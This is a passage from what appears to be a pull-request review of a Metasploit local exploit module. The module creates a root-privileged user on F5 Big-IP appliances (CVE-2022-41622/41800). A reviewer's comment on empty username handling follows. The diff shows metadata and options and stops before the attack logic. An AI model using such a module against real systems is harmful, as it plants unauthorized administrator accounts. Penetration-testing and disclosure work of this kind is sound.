modules/exploits/linux/local/f5_create_user.rb

```diff
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  include Msf::Post::Linux::F5Mcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 Big-IP Create Admin User',
+        'Description' => %q{
+          This creates a local user with a username/password and root-level
+          privileges. Note that a root-level account is not required to do this,
+          which makes it a privilege escalation issue.
+
+          Note that this is pretty noisy, since it creates a user account and
+          creates logfiles and such. Additionally, most (if not all)
+          vulnerabilities in F5 grant root access anyways.
+
+          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Ron Bowes'],
+        'Platform' => [ 'unix', 'linux', 'python' ],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'References' => [
+          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
+          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
+          ['URL', 'https://support.f5.com/csp/article/K97843387'],
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-11-16',
+        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],
+        'Type' => :unix_cmd,
+        'Targets' => [[ 'Auto', {} ]],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [false, 'Username to create (default: random)']),
+      OptString.new('PASSWORD', [false, 'Password for the new user (default: random)']),
+
+      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),
+    ])
+  end
+
+  def exploit
+    # Get or generate the username/password
+    username = datastore['USERNAME'] || Rex::Text.rand_text_alphanumeric(8)
```

Comment:
Note that this won't prevent the operator to intentionally set the option to an empty string. I suggest this instead:
```suggestion
    username = datastore['USERNAME'].present? ? datastore['USERNAME'] : Rex::Text.rand_text_alphanumeric(8)
```

Or, if you chose to move `Rex::Text.rand_text_alphanumeric` to the option declaration (see my previous comment), you can simply add a check for empty strings:
```suggestion
    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?
```

This also apply to the `PASSWORD` option below.